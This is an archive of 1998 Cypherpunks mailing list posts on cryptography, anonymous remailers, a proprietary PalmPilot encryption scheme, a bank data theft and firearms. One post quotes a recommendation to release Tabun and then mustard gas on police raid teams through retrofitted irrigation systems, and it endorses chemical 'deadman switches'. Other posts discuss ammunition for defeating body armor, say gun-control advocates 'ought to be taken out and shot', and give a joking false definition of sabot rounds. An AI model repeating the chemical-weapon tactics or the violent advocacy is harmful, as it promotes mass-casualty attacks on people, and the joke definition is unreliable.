From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@ssz.com>
Date: Mon, 5 Jan 1998 07:31:38 +0800
To: cypherpunks@ssz.com
Subject: index.html
Message-ID: <199801042353.RAA20982@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain





 Welcome to the Cypherpunks Distributed Remailer.

This mailing list is sponsored by The Armadillo Group and other indipendant
operators. The purpose of this mailing list is to explore the frontier of
cryptography, civil liberty, economics, and related issues.

This is a very high traffic mailing list.

Several members of the mailing list are involved in various types of events
through the year. Participation by members of the list does not construe any
support or affilliation with the mailing list. Contact the author of all
works obtained through the remailer network. They retain original rights.

Please let others know about this mailing list, the more the merrier!

To subscribe to the CDR you should contact the individual operators as
conditions at each remailer site may be quite different. To subscribe
through SSZ you should send a note to list@ssz.com or send an email to
majordomo@ssz.com with 'subscribe cypherpunks email_address' in the body.
If you have questions or problems contact list@ssz.com

There may be local groups of members who have regular (or not) meetings
in order to discuss the various issues and projects appropriate to their
individual membership. These groups generaly announce their meetings via the
CDR. Please feel free to make appropriate announcements of activity in your
area.

Austin Cypherpunks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 5 Jan 1998 10:36:34 +0800
To: cypherpunks@Algebra.COM
Subject: Why some people are making nerve gases and such to defendthemselves
In-Reply-To: <tw77m8hi7zs.fsf@the-great-machine.mit.edu>
Message-ID: <v03102804b0d5f3cc61ed@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:19 PM -0800 1/3/98, Lucky Green wrote:

>What you really want is the ability to slow down the mobility of the raid
>force while making your exit. In a prolonged siege, the attacker will
>always win.  A good way of slowing down the attacker after an initial
>armed response is to deploy chemicals. A combination of Tabun and Mustard
>Gas works best, but don't deploy them at the same time. Use the Tabun
>first for maximium impact. Follow up with the Mustard Gas a few minutes
>later. The underground irrigation systems common on California properties
>are ideal means of gas deployment. You should be able to retrofit the
>system for under $500. Assuming you already have the gas. Of course you
>need to make sure to keep a chem suit at home.

In an age where it is accepted (and unpunished) behavior for the black-clad
ninja warriors to shoot through pregnant women, to burn children to death
in the name of publicity for the BATF, to raid the home of a woman who
refused to answer questions of the State psychiatric police, to shoot to
death a retired doctor who the raiders accidentally hit, and on and on,
other measures are needed.

(In none of these cases have the guilty parties been punished. If the State
will not restrain itself, other measures will be needed.)

This may well be why militias and survivalist groups are so actively
developing chemical and biological agents. (I hear that even some of the
dopers in the hills have gotten interested in Sarin release systems. Hoo
boy!)

Sad, but maybe one has to fight fire with fire. If a hundred SWAT
stormtroopers surround a compound and prepare to burn it down, releasing
the countermeasures may be needed.

In fact, leaking (no pun intended) word that a home has CBW deadman
switches may make the ninjas a bit less trigger-happy.

--Tim May, whose house is _not_ booby-trapped with Sarin, or Tabun, or
anything else, but who will defend to his death his right to talk as he
wishes about such things.


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mix <mixmaster@remail.obscura.com>
Date: Mon, 5 Jan 1998 12:00:58 +0800
To: cypherpunks@toad.com
Subject: best body armor for cypherpunks [serious]
Message-ID: <199801050344.TAA10130@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



What is, in your opinion, the best (price and performance-wise)
body armor for cypherpunks?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 5 Jan 1998 11:57:24 +0800
To: cypherpunks@ssz.com
Subject: Re: .50 ammo
In-Reply-To: <3.0.5.32.19980103231222.036b7b90@ctrl-alt-del.com>
Message-ID: <v03102805b0d606fbe3ca@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:24 PM -0800 1/4/98, Igor Chudov @ home wrote:
>Alan wrote:
>> At 04:50 PM 1/3/98 -0500, Brian B. Riley wrote:
>> The hardest part is getting the 50 cal ammo.  (He had his Federal firearms
>> license and was in the National Guard, so it was not too difficult for
>> him.) Getting AP and other special ammo would be doubly difficult.
>> (Non-specialty ammo could be reloaded as long as you could get molds and
>> primer caps.)
>>
>> I guess it depends on your military and/or black market connections.
>
>I have seen what appeared to be .50 ammo (probably not AP) in gun stores.

Armor-piercing ammo, the common kind, is just steel-core ammo. This is
readily available in most calibers, esp. military calibers. (A less common
kind is "KTW" handgun ammo, which is under some recent restrictions. And
even less common, and almost certainly unavailable to the proles, are
"sabot" rounds, some with tungsten cores.)

Importation of steel-core ammo is under various restrictions. Klinton
recently blocked import of a lot of foreign 7.62x39 steel core ammo, on
nebulous grounds that they represented a threat to the ruling elite and
their police bodyguards.

But it's still widely available. Check the gun shows.

(There is little need for this, for even folks like us. We are not likely
to want to disable fleeing vehicles, etc. And even conventional lead-core
rifle rounds will cut through body armor easily, which is all I care about.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Mon, 5 Jan 1998 11:34:51 +0800
To: alan@clueserver.org (Alan)
Subject: .50 ammo
In-Reply-To: <3.0.5.32.19980103231222.036b7b90@ctrl-alt-del.com>
Message-ID: <199801050324.VAA21481@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Alan wrote:
> At 04:50 PM 1/3/98 -0500, Brian B. Riley wrote:
> The hardest part is getting the 50 cal ammo.  (He had his Federal firearms
> license and was in the National Guard, so it was not too difficult for
> him.) Getting AP and other special ammo would be doubly difficult.
> (Non-specialty ammo could be reloaded as long as you could get molds and
> primer caps.) 
> 
> I guess it depends on your military and/or black market connections.

I have seen what appeared to be .50 ammo (probably not AP) in gun stores.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 5 Jan 1998 14:54:50 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <199801042341.PAA26750@netcom5.netcom.com>
Message-ID: <9RcTie5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" <vznuri@netcom.com> writes:

> I posted this to PM's mailing list, but he apparently zapped it
> without comment.

I'm shocked.  I thought the purpose of the perry-moderated list was to
let him reject submissions AND send perrygrams, not just silenty drop
them on the floor!

During the Gilmore/C2net "moderation experiment", Sandy Sandfart not
only silently deleted the submissions he didn't like (he lied when
he claimed that everything he rejects is forwarded to the rejects
list), he also had C2Net lawyers threatening several people whose
articles were rejected, including myself and Timmy May.

Perry can learn a lot from Sandy Sandfart.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Mon, 5 Jan 1998 15:13:25 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: .50 ammo
In-Reply-To: <3.0.5.32.19980103231222.036b7b90@ctrl-alt-del.com>
Message-ID: <3.0.5.32.19980104222937.03ab0100@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 09:24 PM 1/4/98 -0600, Igor Chudov @ home wrote:
>Alan wrote:
>> At 04:50 PM 1/3/98 -0500, Brian B. Riley wrote:
>> The hardest part is getting the 50 cal ammo.  (He had his Federal firearms
>> license and was in the National Guard, so it was not too difficult for
>> him.) Getting AP and other special ammo would be doubly difficult.
>> (Non-specialty ammo could be reloaded as long as you could get molds and
>> primer caps.) 
>> 
>> I guess it depends on your military and/or black market connections.
>
>I have seen what appeared to be .50 ammo (probably not AP) in gun stores.

I am surprised, but I am sure you are correct.  It has been quite a while
since I have spent time in gun shops.  (My expenditures on ammo is limited
to smaller calibers.  I tend not to look at other things because I cannot
afford what I want.)

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Mon, 5 Jan 1998 12:40:51 +0800
To: cypherpunks@www.video-collage.com
Subject: Re: .50 ammo
In-Reply-To: <v03102805b0d606fbe3ca@[207.167.93.63]>
Message-ID: <199801050436.WAA21960@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Tim May wrote:
> Armor-piercing ammo, the common kind, is just steel-core ammo. This is
> readily available in most calibers, esp. military calibers. (A less common
> kind is "KTW" handgun ammo, which is under some recent restrictions. And
> even less common, and almost certainly unavailable to the proles, are
> "sabot" rounds, some with tungsten cores.)

By the way, I keep hearing about these sabot rounds but do not know
what they actually are. Could someone please explain. Thank you.

> (There is little need for this, for even folks like us. We are not likely
> to want to disable fleeing vehicles, etc. And even conventional lead-core
> rifle rounds will cut through body armor easily, which is all I care about.)

Many people underestimate the power of most rifles.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nobuki Nakatuji" <bd1011@hotmail.com>
Date: Mon, 5 Jan 1998 15:18:48 +0800
To: cypherpunks@toad.com
Subject: Is FEAL developed by NTT safe?
Message-ID: <19980105070034.3946.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Is FEAL developed by NTT safe? Where isn't safe if it is here because it 
isn't safe? 


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 5 Jan 1998 12:52:47 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: best body armor for cypherpunks [serious] (fwd)
Message-ID: <199801050513.XAA22310@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 4 Jan 1998 19:44:42 -0800 (PST)
> From: Mix <mixmaster@remail.obscura.com>
> Subject: best body armor for cypherpunks [serious]

> What is, in your opinion, the best (price and performance-wise)
> body armor for cypherpunks?

Not being in the vicinity of the fan...

(I couldn't resist)


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Mon, 5 Jan 1998 15:47:57 +0800
To: "Nobuki Nakatuji" <bd1011@hotmail.com>
Subject: Re: Is FEAL developed by NTT safe?
In-Reply-To: <19980105070034.3946.qmail@hotmail.com>
Message-ID: <3.0.5.32.19980104232746.00b28760@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 11:00 PM 1/4/98 PST, Nobuki Nakatuji wrote:
>
>Is FEAL developed by NTT safe? Where isn't safe if it is here because it 
>isn't safe? 

>From what I have read, FEAL is the punching bag of the cryptographic
community.  It has been broken many times by many people at many different
number of rounds. (It seems to be the one that many cryptanalists have cut
their teeth on.)  

The history of FEAL does not inspire a whole lot of confidence, no matter
who is selling it.

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Mon, 5 Jan 1998 15:33:09 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: .50 ammo
In-Reply-To: <v03102805b0d606fbe3ca@[207.167.93.63]>
Message-ID: <3.0.5.32.19980104232928.0366bdc0@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 10:36 PM 1/4/98 -0600, Igor Chudov @ home wrote:

>By the way, I keep hearing about these sabot rounds but do not know
>what they actually are. Could someone please explain. Thank you.

They are a wooden round made by the dutch for firing into milling machines. 


---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 5 Jan 1998 15:42:28 +0800
To: cypherpunks@Algebra.COM
Subject: Sabots
In-Reply-To: <v03102805b0d606fbe3ca@[207.167.93.63]>
Message-ID: <v03102806b0d638ad90a7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:36 PM -0800 1/4/98, Igor Chudov @ home wrote:
>Tim May wrote:
>> Armor-piercing ammo, the common kind, is just steel-core ammo. This is
>> readily available in most calibers, esp. military calibers. (A less common
>> kind is "KTW" handgun ammo, which is under some recent restrictions. And
>> even less common, and almost certainly unavailable to the proles, are
>> "sabot" rounds, some with tungsten cores.)
>
>By the way, I keep hearing about these sabot rounds but do not know
>what they actually are. Could someone please explain. Thank you.

Typically a dense projectile inside an outer projectile. (Sabot in French
means "shoe," the origin of course of "saboteur.") The outer projectile can
fall away, leaving the inner projectile to continue. The physics of this is
explained in ballistics sources.

This allows smaller projectiles to be launched out of larger bores. Thus,
high density projectiles can be launched out of .50 BMG barrels. Or large
tank barrels (as in the M-1 Abrams tank) can fire sabot projectiles.

(For example, smaller projectiles made of depleted uranium, which punch
through tank armor and then become liquid and incendiary on the inside of
the tank, killing all occupants in milliseconds.)

The term "sabot" is sometimes used interchangeably with "slug," espeically
with respect to shotguns.

It is also possible to use sabots to build a "two-stage" bullet, with a
smaller round firing from inside a sabot. 6000 fps velocities have been
reported. Or so I read.

As always, using the Web is the way to get such answers quickly. A DejaNews
search on "rec.guns  sabot" will turn up many interesting threads.
Especially the older data base.

>> (There is little need for this, for even folks like us. We are not likely
>> to want to disable fleeing vehicles, etc. And even conventional lead-core
>> rifle rounds will cut through body armor easily, which is all I care about.)
>
>Many people underestimate the power of most rifles.

Yep. Every rifle caliber other than .22 LR will penetrate ballistic vests.
Even with a vest rated to stop a .44 Magnum round, from a handgun, the
extra speed from a 16-inch carbine barrel is enough to defeat these vests.

(I have a handy little carbine, the Winchester Trapper, in .44 Magnum. Not
as much punch as an AR-15, but mighty handy.)

More and more "home invaders" (*) are wearing Kevlar body armor, so bear
this in mind.

(* Home invaders are usually gangs of several thieves who enter a home in
force, sometimes by kidnapping the owner and forcing him to let them in,
sometimes just by breaking down the doors. They tend to terrorize the
occupants, tie them up, rape the women, and then, increasingly, kill all
the occupants so as to leave no witnesses. And for "kicks." Of course,
liberals and gun grabbers would have us believe that it is not proper for
homeowners to have guns to defend themselves, that it is for the police to
respond to burglaries. People who think this way are delusional. And if
they go beyond their delusions and attempt to disarm homeowners forcibly,
they ought to be taken out and shot.)

--Tim May




--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 5 Jan 1998 15:51:22 +0800
To: cypherpunks@toad.com
Subject: Re: Is FEAL developed by NTT safe?
In-Reply-To: <19980105070034.3946.qmail@hotmail.com>
Message-ID: <v03102807b0d63ed803b9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:00 PM -0800 1/4/98, Nobuki Nakatuji wrote:
>Is FEAL developed by NTT safe? Where isn't safe if it is here because it
>isn't safe?
>

FEAL am not safe if not safe here.

(Try using a search engine or Schneier, Nobuki Nakatuji, to answer these
stupid little Zen koans you keep hitting us with.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Mon, 5 Jan 1998 12:03:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Microsoft
Message-ID: <19980105040003.18797.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



>At 02:25 98/01/04 +0100, Anonymous wrote:
>> Windows is still fucking me up the ass! I'm bleeding to death here!
>>
>>
>>
>
>For relief, see: http://www.enemy.org/

Uh, how does one read this in Lynx? The first page instructs you to choose
your nearest location. The "Mirror Sites" page is an image map. Chosing this
"image map" will pop up a series of selections like "(318,85)" and chosing
one of these dies with a 404. There are four options below that: "Russia," 
"France," "Brasil," and "Japan." 

Chosing one of these brings you to a bunch of frames which aren't even named
sanely. Frame "ob_li" has nothing in it. Frame "links" has nothing in it.
Frame "un_li" has nothing in it. Frame "oben" has nothing in it. Is anyone
beginning to see a pattern?

Nearest I can tell, the people running enemy.org are just as clueless as the
people programming at Microsoft. It's possible that they're even more
clueless. If they want to attack Microsoft, they need to learn how to make a
web page first.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 5 Jan 1998 23:06:50 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199801051450.GAA13185@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash middle latent cut ek";
$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp pgponly hash cut ksub reord ?";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{"cracker"} = "<remailer@anon.efga.org> cpunk mix remix pgp hash ksub esub latent cut ek reord post";
$remailer{'redneck'} = '<config@anon.efga.org> newnym pgp';
$remailer{"bureau42"} = "<remailer@bureau42.ml.org> cpunk mix pgp ksub hash latent cut ek";
$remailer{"neva"} = "<remailer@neva.org> cpunk pgp pgponly hash cut ksub ?";
$remailer{"lcs"} = "<mix@anon.lcs.mit.edu> mix";
$remailer{"medusa"} = "<medusa@weasel.owl.de> mix middle"
$remailer{"McCain"} = "<mccain@notatla.demon.co.uk> mix middle";
$remailer{"valdeez"} = "<valdeez@juno.com> cpunk pgp pgponly hash ek";
$remailer{"arrid"} = "<arrid@juno.com> cpunk pgp pgponly hash ek";
$remailer{"hera"} = "<goddesshera@juno.com> cpunk pgp pgponly hash ek";
$remailer{"htuttle"} = "<h_tuttle@rigel.cyberpass.net> cpunk pgp hash latent cut post ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix reno winsock)
(weasel squirrel medusa)
(cracker redneck)
(nym lcs)
(valdeez arrid hera)

This remailer list is somewhat phooey. Go check out
http://www.publius.net/rlist.html for a good one.

Last update: Thu 23 Oct 97 15:48:06 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hera     goddesshera@juno.com             ------------  5:03:45  99.86%
nym      config@nym.alias.net             +*#**#**###       :34  95.82%
redneck  config@anon.efga.org             #*##*+#****      2:00  95.44%
mix      mixmaster@remail.obscura.com     +++ ++++++*     19:18  95.27%
squirrel mix@squirrel.owl.de              -- ---+---    2:34:19  95.16%
cyber    alias@alias.cyberpass.net        *++***+ ++      11:26  95.11%
replay   remailer@replay.com              ****   ***      10:06  94.93%
arrid    arrid@juno.com                   ----.------   8:50:34  94.41%
bureau42 remailer@bureau42.ml.org          ---------    3:38:29  93.53%
cracker  remailer@anon.efga.org           +  +*+*+*+      16:32  92.80%
jam      remailer@cypherpunks.ca          +  +*-++++      24:14  92.79%
winsock  winsock@rigel.cyberpass.net      -..-..----    9:59:18  92.22%
neva     remailer@neva.org                ------****+   1:03:02  90.39%
valdeez  valdeez@juno.com                               4:58:22 -36.97%
reno     middleman@cyberpass.net                        1:01:28  -2.65%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Ritter <dritter@bbnplanet.com>
Date: Mon, 5 Jan 1998 21:00:00 +0800
To: Cassidy Lackey <cypherpunks@ssz.com
Subject: Re: Mobile Account Manager
In-Reply-To: <3.0.3.32.19971216090335.00759eec@pobox3.bbn.com>
Message-ID: <3.0.3.32.19980105075118.0072eec0@pobox3.bbn.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:33 PM 1/3/98 -0600, you wrote:
>Mobile Account Manager v1.1  now encrypts the data to the PalmPilot
>database.  For more information, check out our site at
>http://www.mobilegeneration.com or you can download the trial version at
>http://www.mobilegeneration.com/downloads/acctmgr.zip.  Let me know if
>there is anything else we can do!
>
>Cassidy Lackey
>Mobile Generation Software
>www.mobilegeneration.com
>
>Dan Ritter wrote:
>
>> What sort of encryption is used to protect private information in
>> Mobile
>> Account Manager?

>From http://www.mobilegeneration.com :

>After reviewing the costs and benefits associated with each of the published
>                      encryption algorithms (DES, RC4, RC5, IDEA, etc...)
we have decided to utilize a
>                      proprietary Mobile Generation Software data
encryption algorithm.  Most

This does not answer my original question, which is: what encryption method
are
you using? All it says is which encryption methods you are *not* using.


>                      importantly, data encryption must ensure that no
user can view the data in the
>                      PalmPilot MAM database or the backup MAM database on
the PC.  We feel that it
>                      is highly unlikely that anyone will attempt to
'break' the encryption and therefore the

If I felt that it was highly unlikely, I'd hardly be asking, would I? Poor 
cryptography is worse than none - it encourages people to believe their data
is safe when it is not. Good cryptography can stand up to having its
algorithms
made public. Can yours?


>                      costs incurred by utilizing the published encryption
algorithms would outweigh the
>                      benefits.  Therefore, we are confident that the MAM
encryption algorithm provides
>                      sufficient data security for the Mobile Account
Manager database.

Without providing more information, customers can not make that decision for
themselves.

>
>                      Below are the costs associated with utilizing many
of the published algorithms for
>                      MAM: 
>
>                           U.S. Laws governing encryption software may not
allow for exportation of
>                           MAM outside of the U.S. 

Then you should be active in political groups advocating change of those laws.
In fact, if you really believe in encryption, you might want to offer this as
a test case - even a reporter can see how silly it is not to be able to
protect
your ATM PIN.

>                           Copyrights and royalties associated with many
of the encryption algorithms
>                           may increase the cost of MAM. 

Many strong encryption algorithms are free.

>                           Complex encryption algorithms drastically
increase the size of the application
>                           and slow the response time of MAM. 

Many algorithms can be tuned for different levels of complexity.

>                      If you feel uncomfortable placing your sensitive
data in the PalmPilot, please let us
>                      know and we will give you some other ideas to ensure
that your data is secure.

I am doing so. I am also copying this to the cypherpunks mailing list,
as other people ought to be made aware of this issue. Nothing I have quoted
seems to be nonpublic information.

-dsr-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 6 Jan 1998 00:33:44 +0800
To: ichudov@Algebra.COM
Subject: Re: .50 ammo
In-Reply-To: <199801050436.WAA21960@manifold.algebra.com>
Message-ID: <199801051627.IAA20090@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home writes:
> 
> Tim May wrote:
> > Armor-piercing ammo, the common kind, is just steel-core ammo. This is
> > readily available in most calibers, esp. military calibers. (A less common
> > kind is "KTW" handgun ammo, which is under some recent restrictions. And
> > even less common, and almost certainly unavailable to the proles, are
> > "sabot" rounds, some with tungsten cores.)
> 
> By the way, I keep hearing about these sabot rounds but do not know
> what they actually are. Could someone please explain. Thank you.

A Sabot is a casing which goes around a bullet, allowing say
a .22 caliber bullet to travel properly down a .30 caliber barrel.
They're usually made of plastic and designed to fall away
from the bullet soon after it leaves the barrel.

It's a hack to get high(er) velocity out of an existing gun, or
to expand the range of available projectiles for a weapon.

I used to see Sabot rounds that were .22 caliber bullets
with a .30 caliber Sabot, in a .30-06 casing.  I think Remington
made them and they were available to the general public.
They were marketed for 'varmint' hunting, as an alternative
to buying a .25-06 or similar varmint rifle.


> > (There is little need for this, for even folks like us. We are not likely
> > to want to disable fleeing vehicles, etc. And even conventional lead-core
> > rifle rounds will cut through body armor easily, which is all I care about.)
> 
> Many people underestimate the power of most rifles.

Yes, and many people want to be able to buy a quick technological fix
to something (like shooting) which requires talent and/or practice to
become good at.

Just like buying a synthesizer doesn't instantly make one a musician, buying
a wonder gun doesn't immediately make one a crack shot.

Not that I'm accusing anyone in this discussion of having this tendency, just
pointing out that the best gun in many situations is the one that you
have run the most rounds through.

-- 
Eric Murray  Chief Security Scientist  N*Able Technologies  www.nabletech.com
(email:  ericm  at  lne.com   or   nabletech.com)          PGP keyid:E03F65E5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 5 Jan 1998 23:06:27 +0800
To: users@ssz.com (SSZ User Mail List)
Subject: Japanese bank rifled by cyber-thieves [CNN]
Message-ID: <199801051522.JAA23261@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    Cyber-thieves target Sakura
>    
>    Data stolen from bank's computers leaked to Tokyo mailing-list vendor
>    
>    January 5, 1998: 8:10 a.m. ET
>    
>    Sakura seeks restructuring - Dec. 30, 1997
>    
>    
>    [IMAGE]
>    
>    Sakura Bank
>    More related sites... TOKYO (Reuters) - Cyber-criminals rifled
>    confidential computer records of a major Japanese bank and stole
